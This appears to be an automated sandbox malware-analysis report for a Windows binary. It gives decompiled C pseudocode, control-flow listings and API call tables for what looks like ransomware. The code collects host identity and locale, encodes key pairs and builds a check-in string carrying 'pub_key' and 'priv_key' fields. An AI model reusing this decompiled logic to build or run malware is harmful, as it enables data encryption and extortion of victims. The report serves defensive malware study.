lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 124->139 129 f585a60-f585a65 125->129 127->128 131 f585a3f-f585a41 127->131 128->123 132 f585a4a 128->132 133 f585a72-f585a7c lstrlenA 129->133 134 f585a67-f585a69 129->134 131->128 132->121 133->124 133->129 134->133 136 f585a6b-f585a6e 134->136 136->133 140 f585bcb-f585bcd 139->140 141 f585bd3 139->141 140->141 142 f585bcf-f585bd1 140->142 143 f585bd5-f585be7 lstrlenW 141->143 142->143 144 f585be9-f585bf1 VirtualFree 143->144 145 f585bf7-f585c18 lstrlenW VirtualAlloc 143->145 144->145 146 f585c1a-f585c2b wsprintfA 145->146 147 f585c2e-f585c67 call f585f00 CryptBinaryToStringA 145->147 146->147 150 f585c69 GetLastError 147->150 151 f585c6f-f585c95 lstrlenA VirtualAlloc lstrlenA 147->151 150->151 152 f585c9f 151->152 153 f585c97-f585c9d 151->153 154 f585ca7-f585cae lstrlenA 152->154 153->152 153->154 155 f585cb0-f585cb4 154->155 156 f585cd6-f585d0d lstrlenA MultiByteToWideChar call f5854f0 154->156 157 f585cb8-f585cbd 155->157 163 f585d5c-f585d62 156->163 164 f585d0f-f585d5b VirtualFree * 4 call f587d70 156->164 159 f585cca-f585cd4 lstrlenA 157->159 160 f585cbf-f585cc1 157->160 159->156 159->157 160->159 162 f585cc3-f585cc6 160->162 162->159 165 f585d69-f585d96 VirtualFree * 3 163->165 166 f585d64-f585d67 163->166 165->110 166->165
                                    C-Code - Quality: 82%
                                    			E0F585860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                    				char _v148;
                                    				char _v152;
                                    				void* _v156;
                                    				int _v160;
                                    				int _v164;
                                    				CHAR* _v172;
                                    				int _v176;
                                    				CHAR* _v184;
                                    				int _v192;
                                    				void* _v196;
                                    				CHAR* _v200;
                                    				CHAR* _v204;
                                    				WCHAR* _v208;
                                    				void* _v212;
                                    				void* _v216;
                                    				signed int _v220;
                                    				short* _v224;
                                    				void* _v228;
                                    				void* _v232;
                                    				void* _v236;
                                    				CHAR* _v240;
                                    				CHAR* _v268;
                                    				void* __esi;
                                    				CHAR* _t134;
                                    				void* _t136;
                                    				int _t146;
                                    				void* _t149;
                                    				int _t150;
                                    				signed int _t151;
                                    				void* _t153;
                                    				int _t159;
                                    				signed int _t167;
                                    				signed int _t171;
                                    				CHAR* _t178;
                                    				int _t179;
                                    				CHAR* _t182;
                                    				void* _t191;
                                    				long _t195;
                                    				void _t210;
                                    				int _t211;
                                    				intOrPtr _t215;
                                    				int _t216;
                                    				char _t217;
                                    				long _t226;
                                    				int _t239;
                                    				char* _t240;
                                    				void* _t244;
                                    				void* _t245;
                                    				void* _t248;
                                    				long _t250;
                                    				signed int _t254;
                                    				CHAR* _t256;
                                    				int _t259;
                                    				int _t260;
                                    				void* _t261;
                                    				void* _t266;
                                    				CHAR* _t267;
                                    				void* _t270;
                                    				CHAR* _t273;
                                    				long _t276;
                                    				CHAR* _t277;
                                    				char* _t279;
                                    				signed int _t282;
                                    				int _t283;
                                    				long _t286;
                                    				void* _t287;
                                    				void* _t288;
                                    				WCHAR* _t289;
                                    				WCHAR* _t290;
                                    				void* _t291;
                                    				WCHAR* _t292;
                                    				WCHAR* _t294;
                                    				int _t297;
                                    				long _t298;
                                    				void* _t299;
                                    				CHAR* _t300;
                                    				int _t302;
                                    				signed int _t303;
                                    				void* _t307;
                                    
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_v184 = __ecx;
                                    				_v160 = __edx;
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_t307 = (_t303 & 0xfffffff8) - 0x9c;
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				E0F583BC0( &_v148);
                                    				E0F587490( &_v236, __edx); // executed
                                    				_t266 = E0F5872A0( &_v236);
                                    				_t282 = _a8 + __edx;
                                    				_t7 = _t282 + 8; // 0x8
                                    				_t226 = _t266 + _t7 * 8 << 3;
                                    				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
                                    				_t259 = 0;
                                    				_v240 = _t134;
                                    				_v268 = _t134;
                                    				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
                                    				if(_t134 == 0 || _t239 >= _t226) {
                                    					_v176 = _t259;
                                    					_t267 = _t134;
                                    				} else {
                                    					_t267 = _t239 + _t134;
                                    					_v176 = _t134;
                                    					_v184 = _t267;
                                    					_t259 = _t239;
                                    				}
                                    				_t136 = 2 + _a8 * 8;
                                    				if(_v156 == 0) {
                                    					L7:
                                    					_t240 = 0;
                                    					_v172 = 0;
                                    				} else {
                                    					_t302 = _t259 + _t136;
                                    					if(_t302 >= _t226) {
                                    						goto L7;
                                    					} else {
                                    						_t240 = _t267;
                                    						_v172 = _t267;
                                    						_t267 =  &(_t267[_t136]);
                                    						_t259 = _t302;
                                    						_v184 = _t267;
                                    					}
                                    				}
                                    				_t283 = _v164;
                                    				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
                                    					_t267 = 0;
                                    					_v184 = 0;
                                    				}
                                    				if(_t240 == 0) {
                                    					L58:
                                    					VirtualFree(_v156, 0, 0x8000);
                                    					E0F587D70( &_v152);
                                    					return 1;
                                    				} else {
                                    					_t260 = _a8;
                                    					_v160 = _t260 + _t260;
                                    					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
                                    					_v176 = _t283 + _t283;
                                    					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
                                    					_t146 = lstrlenA(_t267);
                                    					_t286 = _t146 + lstrlenA(_v204) + 0x42;
                                    					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
                                    					_v196 = _t149;
                                    					_v200 = _t149;
                                    					_v220 = 0;
                                    					_t150 = lstrlenA(_v204);
                                    					_t261 = _v196;
                                    					_t151 = _t150 + 1;
                                    					if(_t261 == 0 || _t151 >= _t286) {
                                    						_v212 = 0;
                                    					} else {
                                    						_v220 = _t151;
                                    						_v200 = _t261 + _t151;
                                    						_v212 = _t261;
                                    					}
                                    					_t153 = lstrlenA(_t267) + 1;
                                    					if(_v196 == 0 || _t153 + _v220 >= _t286) {
                                    						_v200 = 0;
                                    					}
                                    					_t287 = 0;
                                    					if(lstrlenA(_v204) != 0) {
                                    						_t279 = _v212;
                                    						do {
                                    							_t256 = _v204;
                                    							_t217 =  *((intOrPtr*)(_t287 + _t256));
                                    							if(_t217 != 0xa && _t217 != 0xd) {
                                    								 *_t279 = _t217;
                                    								_t279 = _t279 + 1;
                                    							}
                                    							_t287 = _t287 + 1;
                                    						} while (_t287 < lstrlenA(_t256));
                                    						_t267 = _v216;
                                    					}
                                    					_t288 = 0;
                                    					if(lstrlenA(_t267) != 0) {
                                    						_t254 = _v200;
                                    						_v220 = _t254;
                                    						do {
                                    							_t215 =  *((intOrPtr*)(_t288 + _t267));
                                    							if(_t215 != 0xa && _t215 != 0xd) {
                                    								 *_t254 = _t215;
                                    								_v220 = _t254 + 1;
                                    							}
                                    							_t288 = _t288 + 1;
                                    							_t216 = lstrlenA(_t267);
                                    							_t254 = _v220;
                                    						} while (_t288 < _t216);
                                    					}
                                    					_t289 = _v208;
                                    					lstrcatW(_t289, L"action=call&");
                                    					_t290 =  &(_t289[lstrlenW(_t289)]);
                                    					_v216 = _t290;
                                    					E0F5870A0( &_v184, _t290); // executed
                                    					_v224 = 0;
                                    					_v208 = 0;
                                    					_t159 = E0F5835C0( &_v224,  &_v208); // executed
                                    					if(_t159 == 0) {
                                    						ExitProcess(_t159); // executed
                                    					}
                                    					lstrcatW(_t290, L"&id=");
                                    					_t270 = _v220;
                                    					lstrcatW(_t290, _t270);
                                    					lstrcatW(_t290, L"&subid=");
                                    					_t291 = _v204;
                                    					lstrcatW(_v216, _t291);
                                    					VirtualFree(_t270, 0, 0x8000);
                                    					VirtualFree(_t291, 0, 0x8000);
                                    					_t292 = _v216;
                                    					lstrcatW(_t292, L"&pub_key=");
                                    					_t167 = lstrlenW(_t292);
                                    					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
                                    					_t294 = _v216;
                                    					lstrcatW(_t294, L"&priv_key=");
                                    					_t171 = lstrlenW(_t294);
                                    					_t273 = _v200;
                                    					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
                                    					lstrcatW(_v216, L"&version=2.3.1r");
                                    					_t276 = (lstrlenW(_v208) << 4) + 0x12;
                                    					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
                                    					_t244 = 2 + lstrlenW(_v208) * 8;
                                    					_t178 = _v216;
                                    					if(_t178 == 0 || _t244 >= _t276) {
                                    						_t277 = 0;
                                    					} else {
                                    						_t277 = _t178;
                                    					}
                                    					_t179 = lstrlenW(_v208);
                                    					_t245 =  *0xf592a78; // 0x0
                                    					_v220 = _t179;
                                    					if(_t245 != 0) {
                                    						VirtualFree(_t245, 0, 0x8000);
                                    					}
                                    					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
                                    					 *0xf592a78 = _t182;
                                    					if(_t182 != 0) {
                                    						wsprintfA(_t182, "%S", L"popkadurak");
                                    						_t307 = _t307 + 0xc;
                                    					}
                                    					_t297 = _v220 + _v220;
                                    					E0F585F00(_v208, _t297, _t297);
                                    					_v192 = _v220 * 8;
                                    					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
                                    						GetLastError();
                                    					}
                                    					_t104 = lstrlenA(_t277) + 2; // 0x2
                                    					_t298 = _t104;
                                    					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
                                    					_t106 = lstrlenA(_t277) + 1; // 0x1
                                    					_t248 = _t106;
                                    					_t191 = _v228;
                                    					if(_t191 == 0) {
                                    						L46:
                                    						_v216 = 0;
                                    					} else {
                                    						_v216 = _t191;
                                    						if(_t248 >= _t298) {
                                    							goto L46;
                                    						}
                                    					}
                                    					_t299 = 0;
                                    					if(lstrlenA(_t277) != 0) {
                                    						_v236 = _v216;
                                    						do {
                                    							_t210 =  *((intOrPtr*)(_t299 + _t277));
                                    							if(_t210 != 0xa && _t210 != 0xd) {
                                    								 *_t248 = _t210;
                                    								_v236 = _t248 + 1;
                                    							}
                                    							_t299 = _t299 + 1;
                                    							_t211 = lstrlenA(_t277);
                                    							_t248 = _v236;
                                    						} while (_t299 < _t211);
                                    					}
                                    					_t300 = _v216;
                                    					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
                                    					_v236 = 0;
                                    					_t195 = E0F5854F0(_t300,  &_v236, _t248, 1);
                                    					if(_t195 != 0) {
                                    						_t250 = _v236;
                                    						if(_t250 != 0) {
                                    							 *_a12 = _t250;
                                    						}
                                    						VirtualFree(_v228, 0, 0x8000);
                                    						VirtualFree(_v232, 0, 0x8000);
                                    						VirtualFree(_v212, 0, 0x8000);
                                    						goto L58;
                                    					} else {
                                    						VirtualFree(_v228, _t195, 0x8000);
                                    						VirtualFree(_v232, 0, 0x8000);
                                    						VirtualFree(_v212, 0, 0x8000);
                                    						VirtualFree(_v204, 0, 0x8000);
                                    						E0F587D70( &_v200);
                                    						return 0;
                                    					}
                                    				}
                                    			}


















































































                                    0x0f58586f
                                    0x0f585870
                                    0x0f585872
                                    0x0f585873
                                    0x0f585878
                                    0x0f58587e
                                    0x0f585882
                                    0x0f585884
                                    0x0f585885
                                    0x0f585887
                                    0x0f585888
                                    0x0f58588a
                                    0x0f58588b
                                    0x0f58588d
                                    0x0f58588e
                                    0x0f585890
                                    0x0f585893
                                    0x0f585895
                                    0x0f585896
                                    0x0f58589f
                                    0x0f5858a8
                                    0x0f5858b9
                                    0x0f5858bb
                                    0x0f5858c4
                                    0x0f5858ca
                                    0x0f5858d0
                                    0x0f5858d6
                                    0x0f5858d8
                                    0x0f5858dc
                                    0x0f5858e3
                                    0x0f5858ec
                                    0x0f585901
                                    0x0f585905
                                    0x0f5858f2
                                    0x0f5858f2
                                    0x0f5858f5
                                    0x0f5858f9
                                    0x0f5858fd
                                    0x0f5858fd
                                    0x0f58590f
                                    0x0f585916
                                    0x0f58592f
                                    0x0f58592f
                                    0x0f585931
                                    0x0f585918
                                    0x0f585918
                                    0x0f58591d
                                    0x00000000
                                    0x0f58591f
                                    0x0f58591f
                                    0x0f585921
                                    0x0f585925
                                    0x0f585927
                                    0x0f585929
                                    0x0f585929
                                    0x0f58591d
                                    0x0f58593a
                                    0x0f58593e
                                    0x0f58594d
                                    0x0f58594f
                                    0x0f58594f
                                    0x0f58595b
                                    0x0f585d98
                                    0x0f585da3
                                    0x0f585da9
                                    0x0f585db9
                                    0x0f585961
                                    0x0f585961
                                    0x0f58596d
                                    0x0f585980
                                    0x0f585985
                                    0x0f585999
                                    0x0f5859a2
                                    0x0f5859b6
                                    0x0f5859bb
                                    0x0f5859c5
                                    0x0f5859c9
                                    0x0f5859cd
                                    0x0f5859d5
                                    0x0f5859d7
                                    0x0f5859db
                                    0x0f5859de
                                    0x0f5859f5
                                    0x0f5859e4
                                    0x0f5859e7
                                    0x0f5859eb
                                    0x0f5859ef
                                    0x0f5859ef
                                    0x0f585a00
                                    0x0f585a06
                                    0x0f585a10
                                    0x0f585a10
                                    0x0f585a1c
                                    0x0f585a22
                                    0x0f585a24
                                    0x0f585a30
                                    0x0f585a30
                                    0x0f585a34
                                    0x0f585a39
                                    0x0f585a3f
                                    0x0f585a41
                                    0x0f585a41
                                    0x0f585a43
                                    0x0f585a46
                                    0x0f585a4a
                                    0x0f585a4a
                                    0x0f585a4f
                                    0x0f585a55
                                    0x0f585a57
                                    0x0f585a5b
                                    0x0f585a60
                                    0x0f585a60
                                    0x0f585a65
                                    0x0f585a6b
                                    0x0f585a6e
                                    0x0f585a6e
                                    0x0f585a73
                                    0x0f585a74
                                    0x0f585a76
                                    0x0f585a7a
                                    0x0f585a60
                                    0x0f585a7e
                                    0x0f585a8e
                                    0x0f585a9b
                                    0x0f585a9f
                                    0x0f585aa3
                                    0x0f585aac
                                    0x0f585ab8
                                    0x0f585ac0
                                    0x0f585ac7
                                    0x0f585aca
                                    0x0f585aca
                                    0x0f585ad6
                                    0x0f585ad8
                                    0x0f585ade
                                    0x0f585aea
                                    0x0f585af0
                                    0x0f585af9
                                    0x0f585b0d
                                    0x0f585b17
                                    0x0f585b19
                                    0x0f585b23
                                    0x0f585b30
                                    0x0f585b4a
                                    0x0f585b50
                                    0x0f585b5a
                                    0x0f585b61
                                    0x0f585b63
                                    0x0f585b79
                                    0x0f585b88
                                    0x0f585ba6
                                    0x0f585bb6
                                    0x0f585bbc
                                    0x0f585bc3
                                    0x0f585bc9
                                    0x0f585bd3
                                    0x0f585bcf
                                    0x0f585bcf
                                    0x0f585bcf
                                    0x0f585bd9
                                    0x0f585bdb
                                    0x0f585be1
                                    0x0f585be7
                                    0x0f585bf1
                                    0x0f585bf1
                                    0x0f585c0b
                                    0x0f585c11
                                    0x0f585c18
                                    0x0f585c25
                                    0x0f585c2b
                                    0x0f585c2b
                                    0x0f585c36
                                    0x0f585c3b
                                    0x0f585c4b
                                    0x0f585c67
                                    0x0f585c69
                                    0x0f585c69
                                    0x0f585c79
                                    0x0f585c79
                                    0x0f585c86
                                    0x0f585c8c
                                    0x0f585c8c
                                    0x0f585c8f
                                    0x0f585c95
                                    0x0f585c9f
                                    0x0f585c9f
                                    0x0f585c97
                                    0x0f585c97
                                    0x0f585c9d
                                    0x00000000
                                    0x00000000
                                    0x0f585c9d
                                    0x0f585ca8
                                    0x0f585cae
                                    0x0f585cb4
                                    0x0f585cb8
                                    0x0f585cb8
                                    0x0f585cbd
                                    0x0f585cc3
                                    0x0f585cc6
                                    0x0f585cc6
                                    0x0f585ccb
                                    0x0f585ccc
                                    0x0f585cce
                                    0x0f585cd2
                                    0x0f585cb8
                                    0x0f585cd6
                                    0x0f585cec
                                    0x0f585cf9
                                    0x0f585d03
                                    0x0f585d0d
                                    0x0f585d5c
                                    0x0f585d62
                                    0x0f585d67
                                    0x0f585d67
                                    0x0f585d7b
                                    0x0f585d89
                                    0x0f585d96
                                    0x00000000
                                    0x0f585d0f
                                    0x0f585d20
                                    0x0f585d2e
                                    0x0f585d3b
                                    0x0f585d48
                                    0x0f585d4e
                                    0x0f585d5b
                                    0x0f585d5b
                                    0x0f585d0d

                                    APIs
                                      • Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                      • Part of subcall function 0F587490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                      • Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
                                      • Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
                                      • Part of subcall function 0F587490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                      • Part of subcall function 0F587490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                      • Part of subcall function 0F587490: RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • VirtualAlloc.KERNELBASE(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F5858D0
                                    • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F585980
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F585999
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5859A2
                                    • lstrlenA.KERNEL32(?), ref: 0F5859AA
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0F5859BB
                                    • lstrlenA.KERNEL32(?), ref: 0F5859D5
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5859FE
                                    • lstrlenA.KERNEL32(?), ref: 0F585A1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
                                    • String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
                                    • API String ID: 1618292170-4215222798
                                    • Opcode ID: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
                                    • Instruction ID: b9584b2a845e0a2e827ca7c1910d1fc0087ab1b871bccb272c95d9676d165f48
                                    • Opcode Fuzzy Hash: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
                                    • Instruction Fuzzy Hash: C0F1AC71208301AFD710EF24DC85B6BBBA9FF88725F04092DF585B7291E774A90ACB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 100%
                                    			_entry_() {
                                    				void* _v8;
                                    				void* _v12;
                                    				CHAR* _v16;
                                    				int _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				void* _v32;
                                    				int _v36;
                                    				int _v40;
                                    				int _v44;
                                    				int _v48;
                                    				int _v52;
                                    				int _v60;
                                    				char _v80;
                                    				void* _t54;
                                    				void* _t55;
                                    				int _t79;
                                    				void* _t81;
                                    				short* _t97;
                                    				void* _t114;
                                    
                                    				Sleep(0x3e8); // executed
                                    				_t54 = E0F5847D0(_t90, _t106); // executed
                                    				if(_t54 == 0) {
                                    					_t55 = CreateThread(0, 0, E0F582D30, 0, 0, 0); // executed
                                    					_v8 = _t55;
                                    					if(_v8 != 0) {
                                    						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                    							_t90 = _v8;
                                    							TerminateThread(_v8, 0);
                                    						}
                                    						_t106 = _v8;
                                    						CloseHandle(_v8); // executed
                                    					}
                                    					E0F5848C0(); // executed
                                    					E0F5842B0(_t90, _t106); // executed
                                    					E0F586550( &_v80); // executed
                                    					_v40 = 0;
                                    					_v36 = 0;
                                    					_v28 = 0;
                                    					_v44 = 0;
                                    					E0F586500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
                                    					_v48 = 0;
                                    					_v16 = 0;
                                    					if(E0F584B00(_v28) == 0) {
                                    						while(_v48 == 0) {
                                    							_t81 = E0F585860(_v28, _v44, _v40, _v36,  &_v16); // executed
                                    							_t114 = _t114 + 0xc;
                                    							if(_t81 != 0) {
                                    								_v48 = 1;
                                    							} else {
                                    								Sleep(0x2710);
                                    							}
                                    						}
                                    						E0F5864C0( &_v80);
                                    						_v32 = 0;
                                    						_v20 = 0;
                                    						_v52 = 0;
                                    						_v60 = 0;
                                    						__eflags = _v16;
                                    						if(_v16 == 0) {
                                    							L19:
                                    							E0F584200();
                                    							InitializeCriticalSection(0xf592a48);
                                    							__eflags = _v52;
                                    							if(__eflags == 0) {
                                    								E0F583FF0( &_v80);
                                    							} else {
                                    								E0F5841D0(_v32, _v20, __eflags);
                                    							}
                                    							DeleteCriticalSection(0xf592a48);
                                    							__eflags = E0F583C70();
                                    							if(__eflags != 0) {
                                    								E0F5845B0(__eflags);
                                    							}
                                    							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                    							__eflags = _v24;
                                    							if(__eflags != 0) {
                                    								GetModuleFileNameW(0, _v24, 0x100);
                                    								E0F583DB0(_v24, _v24, __eflags);
                                    								VirtualFree(_v24, 0, 0x8000);
                                    							}
                                    							__eflags =  *0xf592a44;
                                    							if( *0xf592a44 != 0) {
                                    								_t97 =  *0xf592a44; // 0x23f0000
                                    								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
                                    							}
                                    							ExitThread(0);
                                    						}
                                    						_v20 = lstrlenA(_v16);
                                    						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
                                    						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
                                    						__eflags = _t79;
                                    						if(_t79 != 0) {
                                    							_v52 = 1;
                                    							goto L19;
                                    						}
                                    						ExitProcess(0);
                                    					} else {
                                    						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                    						_t119 = _v12;
                                    						if(_v12 != 0) {
                                    							GetModuleFileNameW(0, _v12, 0x100);
                                    							E0F583DB0(_v12,  &_v44, _t119);
                                    							VirtualFree(_v12, 0, 0x8000);
                                    						}
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				ExitProcess(0);
                                    			}























                                    0x0f584b2b
                                    0x0f584b31
                                    0x0f584b38
                                    0x0f584b51
                                    0x0f584b57
                                    0x0f584b5e
                                    0x0f584b74
                                    0x0f584b78
                                    0x0f584b7c
                                    0x0f584b7c
                                    0x0f584b82
                                    0x0f584b86
                                    0x0f584b86
                                    0x0f584b8c
                                    0x0f584b91
                                    0x0f584b99
                                    0x0f584b9e
                                    0x0f584ba5
                                    0x0f584bac
                                    0x0f584bb3
                                    0x0f584bcd
                                    0x0f584bd2
                                    0x0f584bd9
                                    0x0f584bea
                                    0x0f584c3b
                                    0x0f584c53
                                    0x0f584c58
                                    0x0f584c5d
                                    0x0f584c6c
                                    0x0f584c5f
                                    0x0f584c64
                                    0x0f584c64
                                    0x0f584c73
                                    0x0f584c78
                                    0x0f584c7d
                                    0x0f584c84
                                    0x0f584c8b
                                    0x0f584c92
                                    0x0f584c99
                                    0x0f584c9d
                                    0x0f584cef
                                    0x0f584cef
                                    0x0f584cf9
                                    0x0f584cff
                                    0x0f584d03
                                    0x0f584d15
                                    0x0f584d05
                                    0x0f584d0b
                                    0x0f584d0b
                                    0x0f584d1f
                                    0x0f584d2a
                                    0x0f584d2c
                                    0x0f584d2e
                                    0x0f584d2e
                                    0x0f584d47
                                    0x0f584d4a
                                    0x0f584d4e
                                    0x0f584d5b
                                    0x0f584d64
                                    0x0f584d74
                                    0x0f584d74
                                    0x0f584d7a
                                    0x0f584d81
                                    0x0f584d89
                                    0x0f584d97
                                    0x0f584d97
                                    0x0f584d9f
                                    0x0f584d9f
                                    0x0f584ca9
                                    0x0f584cbf
                                    0x0f584cd6
                                    0x0f584cdc
                                    0x0f584cde
                                    0x0f584ce8
                                    0x00000000
                                    0x0f584ce8
                                    0x0f584ce2
                                    0x0f584bec
                                    0x0f584c00
                                    0x0f584c03
                                    0x0f584c07
                                    0x0f584c14
                                    0x0f584c1d
                                    0x0f584c2d
                                    0x0f584c2d
                                    0x0f584c35
                                    0x0f584c35
                                    0x0f584bea
                                    0x0f584b3c

                                    APIs
                                    • Sleep.KERNELBASE(000003E8), ref: 0F584B2B
                                      • Part of subcall function 0F5847D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
                                      • Part of subcall function 0F5847D0: lstrcpyW.KERNEL32 ref: 0F58484F
                                      • Part of subcall function 0F5847D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
                                      • Part of subcall function 0F5847D0: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
                                      • Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
                                      • Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
                                      • Part of subcall function 0F5847D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B
                                    • ExitProcess.KERNEL32 ref: 0F584B3C
                                    • CreateThread.KERNELBASE ref: 0F584B51
                                    • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F584B69
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 0F584B7C
                                    • CloseHandle.KERNEL32(00000000), ref: 0F584B86
                                    • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F584BFA
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F584C14
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F584C2D
                                    • ExitProcess.KERNEL32 ref: 0F584C35
                                    Strings
                                    Memory Dump Source
